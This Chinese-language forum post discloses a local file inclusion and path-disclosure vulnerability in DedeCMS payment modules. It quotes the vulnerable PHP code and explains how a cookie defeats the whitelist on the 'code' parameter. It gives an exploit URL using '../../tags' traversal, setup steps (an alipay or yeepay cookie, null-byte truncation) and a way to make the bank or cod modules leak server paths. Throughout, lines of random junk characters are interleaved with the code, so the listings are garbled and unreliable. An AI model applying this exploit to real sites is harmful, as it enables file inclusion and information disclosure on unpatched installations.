dedecms本地文件包含及物理路径泄露0day

admin

晚餐吃撑了，瞄下代码消化消化。最近Php0day群里的兄弟都在讨论dede洞多，赶紧下了套，用editplus搜索了几个关键字，果然发现些问题。(话说平时写代码也喜欢用editplus，小巧方便多年习惯)

出现漏洞的两个文件为：
( u. C8 q2 n- b' a( BInclude/payment/alipay.php
; e. M& V7 |* K( y. K5 oInclude/payment/yeepay.php
漏洞均出现在respond方法里，估计这两个文件是临时工写的。
0 I& V, H6 a& U3 D+ [  O4 @1 P
2 v  o/ F% |' YInclude/payment/alipay.php
, |  r/ y# l0 |" V
6 Y. P& H5 g7 n/ I3 o......
   function respond()
    {
9 J: X" a! D+ k0 g5 l1 V7 |9 @        if (!empty($_POST))
        {
3 L+ `/ z4 V8 I            foreach($_POST as $key => $data)
% G) ^8 S6 {: b$ ~+ `/ m% `# |            {
                $_GET[$key] = $data;
. W0 {$ F; i! B/ v            }
, G; s# n# {$ U$ [% \) g        }
% t5 f- L  R8 f5 M        /* 引入配置文件 */
3 `; ?( b. e( G  p5 X        require_once DEDEDATA.'/payment/'.$_GET['code'].'.php';
......

$ E/ Z$ A& z. \6 G1 K1 c. t
大概在133行左右，$_GET[‘code’]没有经过任何判断和过滤。
% Z5 E- O  v+ `( ?, {
Include/payment/yeepay.php

( c1 e! H, }5 G* p- n! M$ c$ V
- W  |) Y. _- S4 Z9 K
) b4 s: _  U& |+ @% o......
    function respond()
    {

) h! U/ m: i& K. r2 O$ `" z6 E        /* 引入配置文件 */
- [9 }' N$ Z! n! [, L' e+ r        require_once DEDEDATA.'/payment/'.$_REQUEST['code'].'.php';

) U& C% A% w8 q& R5 f% w5 i; c9 h        $p1_MerId = trim($payment['yp_account']);
/ c" M1 Y3 n8 b        $merchantKey = trim($payment['yp_key']);
......
6 U; ~9 R: Y; s$ z0 m) R4 _/ ^
9 s( w$ e8 n! a$ V  ^
" @. b3 L9 c" n  H% d' Q8 ^6 A

9 ], c' N+ ?! E( [7 R大概在145行左右，$_REQUEST['code']没有经过任何判断和过滤。

% j9 E) G( u& Q* Q这两个方法在plus/carbuyaction.php文件调用。

# q9 u& h; l  C4 I- U6 `( C9 Qplus/carbuyaction.php

) m( a+ ?9 s) A1 Q6 K......
} else if ($dopost == 'return') {
$ i4 W. L/ u3 W: _2 x0 r& B    $write_list = array('alipay', 'bank', 'cod', 'yeepay');
    if (in_array($code, $write_list))
# f4 s: t3 C# p* r0 F/ F9 d9 l    {
0 f$ t1 j$ U8 _6 F5 }6 e        require_once DEDEINC.'/payment/'.$code.'.php';
        $pay = new $code;
( z  i( D; g2 f/ w, m4 a        $msg=$pay->respond();
# [6 V( U! i* F" L3 f! Z        ShowMsg($msg, "javascript:;", 0, 3000);
        exit();  
    } else {
        exit('Error:File Type Can\'t Recognized!');
9 i* W9 v& G* D" ^2 i7 Q    }
}
......
7 g4 |: p2 N* Y
5 U* N' T8 D5 p, ~, i3 ]3 ^
' D( p$ w. i) ~5 K0 I

& Q0 D* X- K) q3 ]5 }
1 v  `* |' L0 c2 F  x
- g/ [4 f4 G" M& m' r大概在334行，当$dopost等于return的时候就开始进入过程了。熟悉dedecms朋友都知道在include/common.inc.php使用了一种类似register_globals的机制。
所以$_GET['code']或$_REQUEST['code']会变成$code，而$code是经过判断的，值必须在$write_list数组以内这样才能继续后面的流程调用respond方法触发漏洞。这样的话貌似就无法控制$_GET['code']为任意值了。
6 x. |% r  p* b0 r, u  w
回到include/common.inc.php来看看他的机制。
, g: Z7 _8 `4 ^- d. e+ r& C
8 c* I9 U* l& m9 b- v* K2 o- \

" B/ O3 r, a1 L- d......
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
9 i) a0 ~/ Z# a) z2 m) L        foreach($$_request as $_k => $_v)
4 O' m8 }* V$ |0 J        {
                if($_k == 'nvarname') ${$_k} = $_v;
                else ${$_k} = _RunMagicQuotes($_v);
        }
5 X( }0 B% F' Z' M# ^}
1 M$ m! S4 Q! q' k  J7 T& n......
大概在79行，可以看到他是从$_GET,$_POST,$_COOKIE这三个全局变量里取值的。嘿嘿，细心点就发现了吧。从他这个优先机制来讲他是先从get再从post再从cookie也就是说最终$code会是以$_COOKIE[‘code’]的值为准，而我们要控制的是$_GET[‘code’]或$_REQUEST['code']只须要$code的值在$write_list数组以内就行了。Exp:http://www.php0day.com/plus/carb ... amp;code=../../tags上面的Exp是包含根目录下的tags.php文件包含其他后缀请自行构造截断，使用exp测试时须要自己添加一个code等于alipay或yeepay的cookie。暴路径:
由于bank和cod这两个文件并没有respond方法，所以如果code等于bank或者cod时将会暴错泄露路径。注：请勿非法测试，产生后果与本人无关。